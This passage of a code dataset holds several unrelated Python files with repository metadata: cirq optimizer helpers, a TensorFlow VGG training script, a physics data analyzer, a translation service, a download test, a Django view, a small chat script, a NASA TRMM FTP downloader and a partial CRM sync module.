_try_get_known_cz_half_turns(op: ops.Operation, no_symbolic: bool = False\n ) -> Optional[value.TParamVal]:\n if (not isinstance(op, ops.GateOperation) or\n not isinstance(op.gate, ops.CZPowGate)):\n return None\n h = op.gate.exponent\n if no_symbolic and isinstance(h, sympy.Basic):\n return None\n return h\n\n\ndef _try_get_known_phased_pauli(\n op: ops.Operation, no_symbolic: bool = False\n) -> Optional[Tuple[value.TParamVal, value.TParamVal]]:\n if ((no_symbolic and protocols.is_parameterized(op)) or\n not isinstance(op, ops.GateOperation)):\n return None\n gate = op.gate\n\n if isinstance(gate, ops.PhasedXPowGate):\n e = gate.exponent\n p = gate.phase_exponent\n elif isinstance(gate, ops.YPowGate):\n e = gate.exponent\n p = 0.5\n elif isinstance(gate, ops.XPowGate):\n e = gate.exponent\n p = 0.0\n else:\n return None\n return value.canonicalize_half_turns(e), value.canonicalize_half_turns(p)\n\n\ndef _try_get_known_z_half_turns(op: ops.Operation, no_symbolic: bool = False\n ) -> Optional[value.TParamVal]:\n if (not isinstance(op, ops.GateOperation) or\n not isinstance(op.gate, ops.ZPowGate)):\n return None\n h = op.gate.exponent\n if no_symbolic and isinstance(h, sympy.Basic):\n return None\n return h\n","repo_name":"OscarJHernandez/qc_portfolio_optimization","sub_path":"venv/lib/python3.8/site-packages/cirq/optimizers/eject_phased_paulis.py","file_name":"eject_phased_paulis.py","file_ext":"py","file_size_in_byte":14214,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"61"}
+{"seq_id":"72321118273","text":"import tensorflow as tf\r\nimport numpy as np\r\nimport TFRecord\r\n\r\n# 定义网络参数\r\nlearning_rate = 0.001\r\ndisplay_step = 5\r\nepochs = 10\r\nkeep_prob = 0.5\r\n\r\n\r\ndef conv_op(input_op, name, kh, kw, n_out, dh, dw, par):\r\n input_op = tf.convert_to_tensor(input_op)\r\n n_in = input_op.get_shape()[-1].value\r\n with tf.name_scope(name) as scope:\r\n kernel = tf.get_variable(scope + \"w\",\r\n shape=[kh, kw, n_in, n_out],\r\n dtype=tf.float32,\r\n initializer=tf.contrib.layers.xavier_initializer_conv2d())\r\n conv = tf.nn.conv2d(input_op, kernel, (1, dh, dw, 1), padding='SAME')\r\n bias_init_val = tf.constant(0.0, shape=[n_out], dtype=tf.float32)\r\n biases = tf.Variable(bias_init_val, trainable=True, name='b')\r\n z = tf.nn.bias_add(conv, biases)\r\n activation = tf.nn.relu(z, name=scope)\r\n par += [kernel, biases]\r\n return activation\r\n\r\n\r\n# 定义全连接操作\r\n\r\n\r\ndef fc_op(input_op, name, n_out, par):\r\n n_in = input_op.get_shape()[-1].value\r\n with tf.name_scope(name) as scope:\r\n kernel = tf.get_variable(scope + 'w',\r\n shape=[n_in, n_out],\r\n dtype=tf.float32,\r\n initializer=tf.contrib.layers.xavier_initializer())\r\n biases = tf.Variable(tf.constant(0.1, shape=[n_out], dtype=tf.float32), name='b')\r\n # tf.nn.relu_layer对输入变量input_op与kernel做矩阵乘法加上bias,再做RELU非线性变换得到activation\r\n activation = tf.nn.relu_layer(input_op, kernel, biases, name=scope)\r\n par += [kernel, biases]\r\n return activation\r\n\r\n\r\n# 定义池化层\r\ndef mpool_op(input_op, name, kh, kw, dh, dw):\r\n return tf.nn.max_pool(input_op,\r\n ksize=[1, kh, kw, 1],\r\n strides=[1, dh, dw, 1],\r\n padding='SAME',\r\n name=name)\r\n\r\n\r\n# net\r\ndef inference_op(input_op, keep_prob):\r\n p = []\r\n # block 1 -- outputs 112x112x64\r\n conv1_1 = conv_op(input_op, name=\"conv1_1\", kh=3, kw=3, n_out=64, dh=1, dw=1, par=p)\r\n conv1_2 = conv_op(conv1_1, name=\"conv1_2\", kh=3, kw=3, n_out=64, dh=1, dw=1, par=p)\r\n pool1 = mpool_op(conv1_2, name=\"pool1\", kh=2, kw=2, dw=2, dh=2)\r\n\r\n # block 2 -- outputs 56x56x128\r\n conv2_1 = conv_op(pool1, name=\"conv2_1\", kh=3, kw=3, n_out=128, dh=1, dw=1, par=p)\r\n conv2_2 = conv_op(conv2_1, name=\"conv2_2\", kh=3, kw=3, n_out=128, dh=1, dw=1, par=p)\r\n pool2 = mpool_op(conv2_2, name=\"pool2\", kh=2, kw=2, dh=2, dw=2)\r\n\r\n # # block 3 -- outputs 28x28x256\r\n conv3_1 = conv_op(pool2, name=\"conv3_1\", kh=3, kw=3, n_out=256, dh=1, dw=1, par=p)\r\n conv3_2 = conv_op(conv3_1, name=\"conv3_2\", kh=3, kw=3, n_out=256, dh=1, dw=1, par=p)\r\n conv3_3 = conv_op(conv3_2, name=\"conv3_3\", kh=3, kw=3, n_out=256, dh=1, dw=1, par=p)\r\n pool3 = mpool_op(conv3_3, name=\"pool3\", kh=2, kw=2, dh=2, dw=2)\r\n\r\n # block 4 -- outputs 14x14x512\r\n conv4_1 = conv_op(pool3, name=\"conv4_1\", kh=3, kw=3, n_out=512, dh=1, dw=1, par=p)\r\n conv4_2 = conv_op(conv4_1, name=\"conv4_2\", kh=3, kw=3, n_out=512, dh=1, dw=1, par=p)\r\n conv4_3 = conv_op(conv4_2, name=\"conv4_3\", kh=3, kw=3, n_out=512, dh=1, dw=1, par=p)\r\n pool4 = mpool_op(conv4_3, name=\"pool4\", kh=2, kw=2, dh=2, dw=2)\r\n\r\n # block 5 -- outputs 7x7x512\r\n conv5_1 = conv_op(pool4, name=\"conv5_1\", kh=3, kw=3, n_out=512, dh=1, dw=1, par=p)\r\n conv5_2 = conv_op(conv5_1, name=\"conv5_2\", kh=3, kw=3, n_out=512, dh=1, dw=1, par=p)\r\n conv5_3 = conv_op(conv5_2, name=\"conv5_3\", kh=3, kw=3, n_out=512, dh=1, dw=1, par=p)\r\n pool5 = mpool_op(conv5_3, name=\"pool5\", kh=2, kw=2, dw=2, dh=2)\r\n\r\n # flatten\r\n shp = pool5.get_shape()\r\n flattened_shape = shp[1].value * shp[2].value * shp[3].value\r\n resh1 = tf.reshape(pool5, [-1, flattened_shape], name=\"resh1\")\r\n\r\n # fully connected\r\n fc6 = fc_op(resh1, name=\"fc6\", n_out=4096, par=p)\r\n fc6_drop = tf.nn.dropout(fc6, keep_prob, name=\"fc6_drop\")\r\n\r\n fc7 = fc_op(fc6_drop, name=\"fc7\", n_out=4096, par=p)\r\n fc7_drop = tf.nn.dropout(fc7, keep_prob, name=\"fc7_drop\")\r\n\r\n logits = fc_op(fc7_drop, name=\"fc8\", n_out=2, par=p)\r\n return logits\r\n\r\n\r\ndef train(logits, labels):\r\n cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=logits, labels=labels))\r\n\r\n optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost)\r\n\r\n correct_pred = tf.equal(tf.argmax(logits, 1), tf.argmax(labels, 1))\r\n accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\r\n return optimizer, cost, accuracy\r\n\r\n\r\nif __name__ == \"__main__\":\r\n train_filename = \"/home/wc/DataSet/traffic/testTFRecord/train.tfrecords\"\r\n test_filename = \"/home/wc/DataSet/traffic/testTFRecord/test.tfrecords\"\r\n image_batch, label_batch = TFRecord.createBatch(filename=train_filename, batchsize=2)\r\n test_image, test_label = TFRecord.createBatch(filename=test_filename, batchsize=20)\r\n pred = inference_op(input_op=image_batch, keep_prob=keep_prob)\r\n test_pred = inference_op(input_op=test_image, keep_prob=keep_prob)\r\n optimizer, cost, accuracy = train(logits=pred, labels=label_batch)\r\n test_optimizer, test_cost, test_acc = train(logits=test_pred, labels=test_label)\r\n initop = tf.group(tf.global_variables_initializer(), tf.local_variables_initializer())\r\n with tf.Session() as sess:\r\n sess.run(initop)\r\n coord = tf.train.Coordinator()\r\n threads = tf.train.start_queue_runners(sess=sess, coord=coord)\r\n step = 0\r\n while step < epochs:\r\n step += 1\r\n print(step)\r\n _, loss, acc = sess.run([optimizer, cost, accuracy])\r\n if step % display_step == 0:\r\n print(loss, acc)\r\n print(\"training finish!\")\r\n _, testLoss, testAcc = sess.run([test_optimizer, test_cost, test_acc])\r\n print(\"Test acc = \" + str(testAcc))\r\n print(\"Test Finish!\")\r\n","repo_name":"xiaofengShi/Learning_resource","sub_path":"TF/黄文坚-TF实战/My_text/VGG/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6053,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"61"}
+{"seq_id":"74442855234","text":"import numpy as np\nimport scipy\nimport scipy.stats as st\nimport scipy.optimize as opt\nimport matplotlib.pyplot as plt \n\nimport cpt_tools\n\n\nclass CPTanalyzer( object ) :\n\n def __init__( self ) :\n\n self.num_data = 0 \n\n self.Z = 0\n self.A = 0\n self.N = 0\n\n self.ame_mass = 0\n self.ame_freq = 0\n \n self.current_mass_estimate = np.nan\n self.current_freq_estimate = np.nan\n \n self.data_list = [] \n\n self.min_timestamp = np.nan\n\n # don't use numpy arrays for increased efficiency in deleting entries in the middle\n self.radii = []\n self.angles = []\n self.taccs = [] \n self.timestamps = []\n\n # references are defined to have a tacc of 0.\n self.reference_mask = [] \n \n self.f, self.axarr = plt.subplots( 3 ) \n self.f.subplots_adjust( hspace = 0.8 )\n\n self.ref_drift_plot = self.axarr[0]\n self.radius_plot = self.axarr[1]\n self.residual_plot = self.axarr[2] \n\n self.active_data_idx = None\n \n \n def delete_index( self, idx ) :\n\n del self.data_list[ idx ] \n del self.radii[ idx ]\n del self.angles[ idx ]\n del self.taccs[ idx ]\n del self.timestamps[ idx ]\n del self.reference_mask[ idx ]\n\n self.num_data -= 1 \n # try : \n # self.reference_mask.remove( idx ) \n # except :\n # pass\n\n # def compute_reference_indices( self ) :\n # self.reference_indices = np.where( \n\n \n \n # apply fits and update plots \n def append( self, cpt_data ) :\n\n self.data_list.append( cpt_data )\n self.radii.append( np.nan )\n self.angles.append( np.nan )\n self.timestamps.append( cpt_data.timestamp )\n \n tacc = cpt_data.tabor_params.tacc\n self.taccs.append( tacc ) \n\n if tacc == 0 :\n self.reference_mask.append( 1 )\n else :\n self.reference_mask.append( 0 ) \n \n self.num_data += 1 \n # self.update() \n \n # def set_active_fit( self, params, errors, i ) :\n \n \n \n \n # def apply_fit( self, i, bounds ) :\n \n \n # if cpt_data.tacc == 0 :\n # self.reference_timestamps.append( cpt_data.timestamp )\n # # self.reference_radii.append( cpt_data.fit[0][1] )\n # # self.reference_\n\n # else :\n # self.timestamps.append( cpt_data.timestamp )\n \n \n # self.update() \n # pass \n\n\n # def update_min_timestamp( self ) :\n # self.min_timestamp = np.inf\n\n # if self.timestamps :\n # self.min_timestamp = min( self.min_timestamp, min( self.timestamps ) )\n\n # if self.reference_timestamps :\n # self.min_timestamp = min( self.min_timestamp, min( self.reference_timestamps ) )\n \n \n def update_ref_drift_plot( self ) :\n\n self.ref_drift_plot.clear()\n self.ref_drift_plot.set_xlabel( 'Relative Timestamp' )\n self.ref_drift_plot.set_ylabel( 'Absolute Angle' )\n self.ref_drift_plot.set_title( 'Reference Drift' )\n\n if np.sum( self.reference_mask ) == 0 :\n return \n \n references = np.array( self.reference_mask, dtype = bool ) \n \n ref_phase = np.array( self.angles )[ references ]\n ref_timestamps = np.array( self.timestamps )[ references ]\n ref_timestamps -= min( ref_timestamps )\n\n # print( 'plotting ref_drift_plot' )\n # print( self.reference_mask ) \n # print( ref_timestamps )\n # print( ref_phase ) \n\n self.ref_drift_plot.scatter( ref_timestamps, ref_phase, s = 1, c = 'r',\n zorder = 2 ) \n \n # if len( self.reference_timestamps ) < 0 :\n # return\n \n # min_timestamp = min( self.reference_timestamps ) \n # self.references\n\n\n def update_radius_plot( self ) : \n self.radius_plot.clear()\n self.radius_plot.set_xlabel( 'Accumulation Time' )\n self.radius_plot.set_ylabel( 'Radius' )\n self.radius_plot.set_title( 'Radius vs. Accumulation Time' ) \n\n if self.num_data == 0 :\n return\n \n # print( 'plotting radii' ) \n # print( self.taccs )\n # print( self.radii ) \n\n self.radius_plot.scatter( self.taccs, self.radii, s = 1, zorder = 2 ) \n\n \n def update_residual_plot( self ) :\n self.residual_plot.clear()\n self.residual_plot.set_xlabel( 'Accumulation Time' )\n self.residual_plot.set_ylabel( 'Residual' ) \n self.residual_plot.set_title( 'Mass Fit Residuals' ) \n \n \n def update( self ) :\n\n self.update_ref_drift_plot()\n self.update_radius_plot()\n self.update_residual_plot() \n # self.update_mass_estimate()\n \n\n def set_ion_params( self, Z, A, Q ) :\n self.Z = Z\n self.A = A\n self.q = Q\n self.N = A - Z\n self.ame_mass = cpt_tools.nuclear_data.masses[ self.Z, self.N ]\n self.ame_freq = cpt_tools.mass_to_omega( self.ame_mass, self.q, atomic_mass = 1 ) \n\n\n # def compute_ame_phase_estimate( self, tacc, ref_angle ) :\n\n # return \n\n \n\n # compute new mass estimate using all the aggregated data.\n def update_mass_estimate( self ) :\n\n reference_mask = np.array( self.reference_mask, dtype = bool ) & ( ~ np.isnan( self.angles ) )\n non_reference_mask = ( ~ reference_mask ) & ( ~ np.isnan( self.angles ) )\n\n # print( reference_mask )\n # print( non_reference_mask )\n # print( self.timestamps ) \n\n reference_indices = np.where( reference_mask == 1 )[0] \n non_reference_indices = np.where( non_reference_mask == 1 )[0]\n\n print( reference_indices )\n print( non_reference_indices )\n \n if np.sum( reference_mask ) == 0 or np.sum( non_reference_mask ) == 0 :\n self.current_mass_estimate = np.nan\n self.current_freq_estimate = np.nan\n return \n\n #\n # print( self.timestamps.shape )\n # print( self.reference_mask.shape ) \n \n reference_timestamps = np.array( self.timestamps )[ reference_mask ] \n \n num_non_references = len( non_reference_indices )\n measured_phases = np.zeros( num_non_references ) \n \n \n for i in range( num_non_references ) :\n\n #find closest reference\n idx = non_reference_indices[i] # index in self.timestamps \n timestamp = self.timestamps[ idx ]\n rel_ref_idx = np.argmin( np.abs( reference_timestamps - timestamp ) ) # index in reference_timestamps\n ref_idx = reference_indices[ rel_ref_idx ] \n\n phase = self.angles[ idx ] - self.angles[ ref_idx ]\n measured_phases[i] = phase \n\n taccs = np.array( self.taccs )[ non_reference_mask ]\n\n # return \n ret = scipy.optimize.leastsq( freq_estimate_resid, [ self.ame_freq ],\n args = ( taccs, measured_phases ), full_output = 1 )\n \n print( ret ) \n \n \n \nclass GaussianFit( object ) :\n\n def __init__( self, bounds, params, params_errors, redchisqr ) : \n self.bounds = bounds\n self.params = params\n self.params_errors = params_errors\n self.redchisqr = redchisqr \n \n \n\n \ndef gaussian( params, x ) :\n return params[0] * np.exp( - ( x - params[1] ) ** 2\n / ( 2 * params[2] ** 2 ) )\n\n\ndef normalized_gaussian( mu, sigma, x ) :\n sigma_sqr = sigma ** 2 \n return ( ( 1 / np.sqrt( 2 * np.pi * sigma_sqr ) )\n * np.exp( - ( x - mu ) ** 2\n / ( 2 * sigma ** 2 ) ) )\n\n \ndef _resid( params, func, x, y, dy ) :\n return ( y - func( params, x ) ) / dy \n\n\ndef fit_gaussian( x, y, bounds ) :\n print( 'called fit_gaussian' ) \n \n indices = ( x >= bounds[0] ) & ( x <= bounds[1] )\n\n x_cut = x[ indices ]\n y_cut = y[ indices ]\n\n if len( x_cut ) == 0 :\n print( 'WARNING: no data available in the specified bounds...' )\n return None\n\n dy_cut = np.sqrt( y_cut )\n dy_cut[ dy_cut == 0 ] = 1\n \n # print( y_cut ) \n \n max_idx = np.argmax( y_cut )\n mu_guess = float( x_cut[ max_idx ] )# + bounds[0]\n A_guess = float( y_cut[ max_idx ] )\n sigma_guess = 4.0\n\n params_guess = np.array( [ A_guess, mu_guess, sigma_guess ] )\n\n # print( 'params_guess: ', params_guess )\n \n ret = scipy.optimize.leastsq( _resid, params_guess, full_output = 1,\n args = ( gaussian, x_cut, y_cut, dy_cut ) )\n\n params, cov, info, mesg, success = ret\n params[2] = np.abs( params[2] ) \n \n\n if success > 0 :\n\n dof = len( x_cut ) - len( params )\n print( x_cut )\n print( params ) \n print( 'dof: ', dof ) \n \n redchisqr = ( np.sum( _resid( params, gaussian, x_cut, y_cut, dy_cut ) ) ** 2\n / dof ) \n \n if cov is not None :\n params_errors = np.sqrt( redchisqr * np.diag( cov ) )\n else :\n params_errors = None\n \n return GaussianFit( bounds, params, params_errors, redchisqr ) # pvalue\n\n else :\n print( 'WARNING: fit failed...' )\n return None\n \n \n \n\ndef freq_estimate_resid( frequency, taccs, phases ) :\n \n phase_predictions = cpt_tools.freq_to_phase( frequency, taccs )\n print( taccs ) \n print( phases )\n print( phase_predictions ) \n ret = phases - phase_predictions\n print( ret )\n return ret \n \n","repo_name":"jacobpierce1/cpt_tools","sub_path":"gui_controller/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":9801,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"20169936253","text":"from core.domain.word import Word\nfrom core.domain.translation_result import TranslationResult\nfrom typing import List, Optional\nfrom adapter.translator.translator_adapter import TranslatorAdapter\nfrom presenter.presenter import Presenter\nfrom adapter.spellchecker.spell_checker import correct_word_spelling\nfrom adapter.persister.data_persister import DataPersister\n\n\nclass TranslatorService():\n def __init__(self, translator_adapter: TranslatorAdapter, presenter: Presenter, storage: DataPersister):\n self.translator_adapter = translator_adapter\n self.presenter = presenter\n self.storage = storage\n self.input_languages = [\"English\"]\n self.output_languages = [\"Georgian\"]\n\n def translate_word(self, input_word: Word, target_languages: List[str], minimalistic=False) -> None:\n word, corrected_word = correct_word_spelling(input_word.word)\n if word != corrected_word:\n input_word.word = corrected_word\n self.presenter.present_text(f\"### Spelling of: '{input_word.word}' is not correct. Autocorrecting it \"\n f\"to: '{corrected_word}' ###\")\n try:\n if not input_word:\n return\n result: List[TranslationResult] = []\n for language in target_languages:\n if language.lower() == \"georgian\":\n storage_result: Optional[Word] = self.storage.search(input_word, language)\n if storage_result:\n result.append(TranslationResult(input_word, [storage_result]))\n else:\n translator_result = self.translator_adapter.get_georgian_translations_of_word(input_word.word)\n self.storage.put(input_word, translator_result.output_words[0])\n result.append(translator_result)\n self.presenter.present_translations(result[0].input_word, result[0].output_words if not minimalistic else [result[0].output_words[0]])\n except:\n print('Encountered problem with translating input word')\n\n def get_possible_input_languages(self) -> List[str]:\n return self.input_languages\n\n def get_possible_output_languages(self) -> List[str]:\n return self.output_languages\n","repo_name":"nikasakandelidze/translator-cli","sub_path":"src/core/service/translate_service.py","file_name":"translate_service.py","file_ext":"py","file_size_in_byte":2300,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"22639671113","text":"import json\nimport os\nimport tempfile\nfrom pathlib import Path\n\nimport flutes\n\n\ndef test_download() -> None:\n urls = [\n (\"https://drive.google.com/file/d/1bUShb-0taoXGDveut1B31UqzR-M7fEwA/view?usp=sharing\", \"demo.txt\"),\n (\"https://github.com/Somefive/MercuryJson/raw/master/data/numbers-small.json\", \"numbers-small.json\"),\n ]\n\n with tempfile.TemporaryDirectory() as tempdir:\n paths = []\n for url, filename in urls:\n path = Path(flutes.download(url, save_dir=tempdir, filename=filename))\n assert path.name == filename\n assert path.parent == Path(tempdir)\n paths.append(path)\n\n with paths[0].open() as f:\n assert f.read().strip() == \"This is a demo file from Google Drive.\"\n\n with paths[1].open() as f:\n assert all(isinstance(x, float) for x in json.load(f))\n\n for url, filename in urls[1:]:\n download_path = Path(tempfile.gettempdir()) / filename\n if download_path.exists():\n download_path.unlink()\n assert flutes.download(url, progress=True) == str(download_path)\n","repo_name":"huzecong/flutes","sub_path":"tests/test_network.py","file_name":"test_network.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"61"}
+{"seq_id":"3032686073","text":"import shelve\nfrom pathlib import Path\n\nfrom django.shortcuts import render\n\n\n# Create your views here.\ndef index(request):\n current_sdb_dir = Path(Path.home(), 'sdb')\n topic_slug = 'micropython-esp32'\n title = 'why-emp'\n with shelve.open(str(Path(current_sdb_dir, topic_slug + '.sdb')), flag='r') as db:\n context = db[title]\n return render(request, 'main.html', context)\n","repo_name":"JOHY119/django_jinjia","sub_path":"wiki/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"3629368488","text":"print(\"Title of program: Panda Bot\")\nprint()\nwhile True:\n description = input(\"How do you feel in a sentence, don't need serious, take it as a casual chat!\")\n\n list_of_words = description.split()\n\n feelings_list = []\n encouragement_list = []\n counter = 0\n \n for each_word in list_of_words:\n \n if each_word == \"bored\":\n feelings_list.append(\"bored\")\n encouragement_list.append(\"tomorrow will be a better day\")\n counter += 1\n if each_word == \"happy\":\n feelings_list.append(\"happy\")\n encouragement_list.append(\"to keep smiling\")\n counter += 1\n if each_word == \"tired\":\n feelings_list.append(\"tired\")\n encouragement_list.append(\"go to sleep\")\n counter += 1\n\n if counter == 0:\n \n output = \"Sorry I don't really understand. Please explain more words?\"\n\n elif counter == 1:\n \n output = \"It seems that you are feeling quite \" + feelings_list[0] + \". However, do remember that \"+ encouragement_list[0] + \"! Hope you feel better :)\" \n\n else:\n\n feelings = \"\" \n for i in range(len(feelings_list)-1):\n feelings += feelings_list[i] + \", \"\n feelings += \"and \" + feelings_list[-1]\n \n encouragement = \"\" \n for j in range(len(encouragement_list)-1):\n encouragement += encouragement_list[i] + \", \"\n encouragement += \"and \" + encouragement_list[-1]\n\n output = \" you are feeling quite \" + feelings + \",arent you Please always remember \"+ encouragement + \"! Hope you feel better,king! :)\"\n\n print()\n print(output)\n print()\n","repo_name":"SiyuanSY/Panda_bot","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"1564849912","text":"__author__ = ['jwely']\n\n# import modules\nfrom download_url import download_url\nfrom list_ftp import list_ftp\nfrom datetime import datetime, timedelta\nimport os\nimport gzip\n\n__all__ = [\"fetch_TRMM\"]\n\n\ndef fetch_TRMM(start_dto, end_dto, outdir, product_string):\n \"\"\"\n Fetches TRMM data from an FTP server.\n\n ftp://trmmopen.gsfc.nasa.gov/trmmdata/ByDate/V07/\n\n :param start_dto: datetime object for start date of desired range\n :param end_dto: datetime object for end date of desired range\n :param outdir: output directory where files should be saved (str)\n :param product_string: the string for the desired product, options include\n 1B11, 1B21, 1CTMI, 2A12, 2A21, 2A23, 2A25, 2B31, 3B42,\n 3G25, 3G31. The usual precip product of interest is the\n well known 3B42 data product.\n\n :param output_files: a list of new filepaths created by this function\n \"\"\"\n\n # set up empty structure\n dates = []\n output_files = []\n ftpsite = \"ftp://pps.gsfc.nasa.gov\"\n un = \"develop.programming14@gmail.com\"\n\n date_delta = end_dto - start_dto\n\n for i in range(date_delta.days +1):\n dates.append(start_dto + timedelta(days = i))\n\n for date in dates:\n\n # navigate to path of desired year/month/day\n workdir = '/'.join(['trmmdata','ByDate','V07',\n str(date.year),\n str(date.month).zfill(2),\n str(date.day).zfill(2)])\n\n filenames, filepaths = list_ftp(site = ftpsite,\n dir = workdir,\n username = un,\n password = un)\n\n for filename in filenames:\n\n if product_string in filename:\n try:\n outname = os.path.join(outdir, os.path.basename(filename))\n download_url(ftpsite + filename, outname, username = un, password = un)\n output_files.append(outname)\n\n # now extract it out of its GZ format\n with gzip.open(outname, 'rb') as gz:\n with open(outname.replace(\".gz\",\"\"), 'wb') as f:\n content = gz.read()\n f.write(content)\n\n os.remove(outname)\n\n\n print(\"downloaded and extracted {0}\".format(os.path.basename(filename)))\n except:\n print(\"failed to download {0}\".format(os.path.basename(filename)))\n\n print(\"Finished downloading TRMM files!\")\n\n return output_files\n\n\nif __name__ == \"__main__\":\n\n start = datetime(2014, 1 ,1)\n end = datetime(2014, 1, 2)\n outfiles = fetch_TRMM(start, end, r\"C:\\Users\\jwely\\Desktop\\troubleshooting\\test\", \"3B42\")\n","repo_name":"NASA-DEVELOP/dnppy","sub_path":"dnppy/download/fetch_TRMM.py","file_name":"fetch_TRMM.py","file_ext":"py","file_size_in_byte":2904,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"61"}
+{"seq_id":"15052999431","text":"from closeio_api import Client as CloseIO_API, APIError\nimport os\nimport requests\nimport json\nimport time\nimport copy\nfrom .format_rs_to_close import format_address_as_string, format_address, format_new_contacts_array, format_opportunity_data, format_note_data, convert_epoch_to_dt\nimport logging\n\n## Initiate Logger\nlog_format = \"[%(asctime)s] %(levelname)s %(message)s\"\nlogging.basicConfig(level=logging.INFO, format=log_format)\n\n## Initiate Close API\napi = CloseIO_API(os.environ.get('CLOSE_API_KEY'))\norg_id = api.get('api_key/' + os.environ.get('CLOSE_API_KEY'))['organization_id']\ndev_api = CloseIO_API(os.environ.get('CLOSE_DEV_API_KEY'))\n\n##############################################\n# Close Methods\n##############################################\n\n## Method to get most recent completed sync time from the Master Lead in the Development Sandbox\n## If we cannot get the most recent completed sync time, we default to 5 minutes before the\n## current time\ndef get_sync_time_from_close(current_time):\n if os.environ.get('MASTER_LEAD_ID'):\n try:\n lead = dev_api.get('lead/' + os.environ.get('MASTER_LEAD_ID'), params={ '_fields': 'custom' })\n if lead['custom'].get('last_sync_time'):\n return int(lead['custom']['last_sync_time'])\n except APIError as e:\n logging.error(\"No Master Lead could be found...\")\n return (current_time - 300000)\n\n## Method to set the sync time on the master lead in Close once a RazorSync sync has been completed at a particular time.\ndef set_sync_time_in_close(last_sync_time):\n if os.environ.get('MASTER_LEAD_ID'):\n try:\n dev_api.put('lead/' + os.environ.get('MASTER_LEAD_ID'), data={ 'custom.last_sync_time': last_sync_time })\n except APIError as e:\n logging.error(\"Could not update sync time on lead because we could not get the master lead...\")\n\n## Method to update an existing address lead in Close with new information if the Customer in RazorSync has been updated.\n## We check the differences in lead name, contacts, and billing address, and make updates where appropriate.\ndef update_lead(lead, addr, cust):\n lead_updates = {}\n name = format_address_as_string(addr)\n contact_names_in_close = { k['display_name'].lower() : k for k in lead['contacts'] }\n if name.strip() != lead['display_name'].strip():\n lead_updates = { 'name': name }\n new_contacts = format_new_contacts_array(cust)\n for contact in new_contacts:\n if contact['name'].lower() in contact_names_in_close:\n close_contact = contact_names_in_close[contact['name'].lower()]\n close_phones_and_emails = [i['email'] for i in close_contact['emails']] + [i['phone'] for i in close_contact['phones']]\n new_contact_phones_and_emails = [i['email'] for i in contact['emails']] + [i['phone'] for i in contact['phones']]\n difference = [i for i in new_contact_phones_and_emails if i not in close_phones_and_emails]\n if difference:\n try:\n if contact.get('date_created'):\n del contact['date_created']\n api.put('contact/' + contact_names_in_close[contact['name'].lower()]['id'], data=contact)\n logging.info(f\"Updated Contact {contact['name']}\")\n except APIError as e:\n logging.error(f\"Failed to update contact {contact_names_in_close[contact['name'].lower()]['id']} because {str(e)}...\")\n else:\n contact['lead_id'] = lead['id']\n try:\n api.post('contact', data=contact)\n logging.info(f\"Posted new contact {contact['name']} on {contact['lead_id']}\")\n except APIError as e:\n logging.error(f\"Failed to post new contact {contact['name']} to lead because {str(e)}\")\n if len(cust['Addresses']) > 1:\n billing_address = [i for i in cust['Addresses'] if i.get('AddressTypeId') and address_types.get(i['AddressTypeId']) == \"Billing\"]\n if billing_address:\n billing_address = format_address_as_string(billing_address[0])\n if billing_address != lead['custom'].get('RS Billing Address'):\n lead_updates['custom.RS Billing Address'] = billing_address\n if lead_updates != {}:\n try:\n api.put('lead/' + lead['id'], data=lead_updates)\n logging.info(f\"Successfully Updated {lead['display_name']}\")\n except APIError as e:\n logging.error(f\"Failed to PUT updates on lead because {str(e)}\")\n\n## Method to create a new lead from a new non-billing address in RazorSync\ndef post_new_close_lead(post_addr, post_cust):\n lead_data = {}\n addresses = []\n ## Note: Appartment is intentionally misspelled here because they have a typo in their API\n lead_data['name'] = format_address_as_string(post_addr)\n lead_data['custom.RS Address ID'] = post_addr['Id']\n lead_data['contacts'] = format_new_contacts_array(post_cust)\n if lead_data['name']:\n addresses.append(format_address(post_addr))\n if addresses:\n lead_data['addresses'] = addresses\n\n ## Check if Lead has a billing address\n if len(post_cust['Addresses']) > 1:\n billing_address = [i for i in post_cust['Addresses'] if i.get('AddressTypeId') and address_types.get(i['AddressTypeId']) == \"Billing\"]\n if billing_address:\n lead_data['custom.RS Billing Address'] = format_address_as_string(billing_address[0])\n if lead_data:\n lead_data['custom.Created via RS Integration'] = 'Yes'\n lead_data['status'] = 'Created via RS Integration'\n try:\n lead = api.post('lead', data=lead_data)\n logging.info(f\"Successfully posted {lead['display_name']}\")\n return lead\n except APIError as e:\n logging.error(f\"Failed to post {lead_data['name']} because {str(e)}\")\n return None\n\n## Method to find a close lead using the RS Address ID custom field and searching for an exact match\ndef find_close_lead_from_rs_address_id(address_id):\n resp = api.get('lead', params={ 'query': f\"\\\"custom.RS Address ID\\\":\\\"{address_id}\\\"\", '_fields': 'id,contacts,opportunities,display_name,custom' })\n if resp['data']:\n return resp['data'][0]\n else:\n return None\n\n## Method to find or create a new lead in Close from an RS address and customer record\n## First, we try to find a lead using find_close_lead_from_rs_address_id. If no lead is found,\n## we post one. If a lead is found, we try to update it.\ndef find_or_create_close_address_lead_from_customer(addr, cust):\n lead = find_close_lead_from_rs_address_id(addr['Id'])\n if not lead:\n lead = post_new_close_lead(addr, cust)\n else:\n update_lead(lead, addr, cust)\n return lead\n\n## This method takes a service item ID that was deleted in RazorSync, found below, and\n## marks the opportunity on the Close lead that reflects that service item as \"Removed From Work Order\".\ndef update_deleted_service_item_to_deleted(serv_id, opportunities):\n opp = find_potential_close_opp_from_work_order_service_item_id(opportunities, serv_id)\n if opp and opp['status_label'] != 'Removed From Work Order':\n try:\n api.put('opportunity/' + 